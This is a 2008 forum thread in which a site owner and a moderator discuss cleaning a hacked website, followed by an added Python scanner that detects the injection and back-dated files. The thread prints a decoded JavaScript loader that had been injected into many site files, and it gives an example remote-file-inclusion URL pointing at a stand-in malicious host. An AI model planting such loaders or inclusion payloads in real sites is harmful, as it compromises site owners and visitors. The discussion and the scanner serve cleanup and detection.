evaders99 (Moderator)
Joined: Apr 30, 2004    Posts: 2846
Posted: Sat Mar 08, 2008 1:55 am
Yep, looks like standard remote file inclusions. The code he posted would seem to block them.
Did you still have questions? You seem to be getting the hang of this.
Nash (Regular)
Joined: Jan 10, 2006    Posts: 86
Posted: Sat Mar 08, 2008 9:46 am
Getting there bit by bit. Still do have questions, but I will spend some more time today going through and compile a short list of them.
I found that a ton of my .js and .css files had the Exhibit A code appended to them, so I manually went through and removed those occurrences.
I still see my site being crawled with a lot of GET commands in a row, which leads me to believe the walkdir is still being executed. This leads me to believe that somehow that code is either on my server, or being executed via a hole somewhere (e.g., eastcoastbodyboarding.com/index.php?file=http://www.badsite.com/badfile.php). Does that sound right?
How would you go about locating what is causing my directories to be walked? I added that bit of code to my .htaccess to stop http: from being passed into URLs. I think though that certain directories have their own .htaccess files, so I will need to modify them as well.
evaders99 (Moderator)
Joined: Apr 30, 2004    Posts: 2846
Posted: Sat Mar 08, 2008 4:28 pm
Quote:
    somehow that code is either on my server, or being executed via a hole somewhere
A pretty good possibility. You may have to ask your host about it if you don't have root access to your server. There may be some process that the hackers have running in memory.
.htaccess applies to all subdirectories unless a subdirectory has its own .htaccess file.
So the one .htaccess in the root directory should protect all subdirectories.
Nash (Regular)
Joined: Jan 10, 2006    Posts: 86
Posted: Sat Mar 08, 2008 7:22 pm
Thanks for the reply. Yeah, the b*strd seems to have copied some of my .htaccess files. Would be easy enough to clean, but some of the other installs I have (like osCommerce and IBF) have their own .htaccess files in subdirectories. Will just have to get them all. I sort of suspect that the hacker originally got in through the deprecated osCommerce and Openads folders I had on my account. I wasn't using them anymore and naively thought that if they weren't linked to anything, no one would see them.
Nash (Regular)
Joined: Jan 10, 2006    Posts: 86
Posted: Sat Mar 08, 2008 8:03 pm
This is the decrypted version of Exhibit A, by the way:
Code:
    // Runs only once per page: the id 'JSSS' marks a page that already carries the loader
    if (!document.getElementById('JSSS'))
    {
      // Globals set before the loaded script runs
      JSS1 = 54;
      JSS2 = 152567;
      JSS3 = '/osc/images/apebu/dummy.htm';
      // Build a <script> tag that loads check.js from the site's own /osc/images/apebu/ directory
      var js = document.createElement('script');
      js.setAttribute('src', '/osc/images/apebu/check.js');
      js.setAttribute('id', 'JSSS');
      // Append it to <head> so the browser fetches and executes check.js
      document.getElementsByTagName('head').item(0).appendChild(js)
    };
Nash (Regular)
Joined: Jan 10, 2006    Posts: 86
Posted: Mon Mar 17, 2008 8:01 am
Interesting. Looking at the malcode some more, it's actually re-writing the modification date and time of the file so that it does not show up as newly modified.
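A defender-side check prompted by Nash's last two posts (the injected loader in Exhibit A and the rewritten modification time), written here as an added example and not code from this thread: it walks a web root looking for files that carry the Exhibit A marker, and separately flags files whose ctime is far ahead of their mtime, because resetting mtime with utime() still makes the kernel bump ctime. The web-root layout, the file names and the one-hour gap are assumptions; build_sample_webroot() creates constructed input so the block runs offline.

```python
import os
import re
import tempfile

# Markers taken from the decoded "Exhibit A" snippet posted in this thread.
INJECTION_RE = re.compile(r"getElementById\('JSSS'\)|/osc/images/apebu/")
SCAN_EXTENSIONS = {".js", ".css", ".htm", ".html", ".php"}
# utime() can rewrite mtime, but the kernel stamps ctime with the real clock, so
# ctime far ahead of mtime means mtime was reset after the last write (Linux/macOS).
TIMESTOMP_GAP_SECONDS = 3600  # assumed threshold

def scan_file(path):
    """Return findings for one file: 'injected' and/or 'timestomped'."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        body = fh.read()
    if INJECTION_RE.search(body):
        findings.append("injected")
    st = os.stat(path)
    if st.st_ctime - st.st_mtime > TIMESTOMP_GAP_SECONDS:
        findings.append("timestomped")
    return findings

def scan_tree(root):
    """Walk a web root; map each suspicious file (relative path) to its findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in SCAN_EXTENSIONS:
                path = os.path.join(dirpath, name)
                found = scan_file(path)
                if found:
                    report[os.path.relpath(path, root)] = found
    return report

def build_sample_webroot():
    """Constructed sample: one clean file and one infected, back-dated file."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "osc", "js"))
    with open(os.path.join(root, "osc", "js", "menu.js"), "w") as fh:
        fh.write("function toggleMenu(id) { /* legitimate site code */ }\n")
    bad = os.path.join(root, "osc", "js", "site.js")
    with open(bad, "w") as fh:
        fh.write("function helper() {}\nif (!document.getElementById('JSSS')) {}\n")
    old = os.stat(bad).st_mtime - 365 * 86400  # mimic the malcode: back-date mtime
    os.utime(bad, (old, old))
    return root
```

Point scan_tree() at the real document root; build_sample_webroot() exists only so the block can be exercised against constructed input.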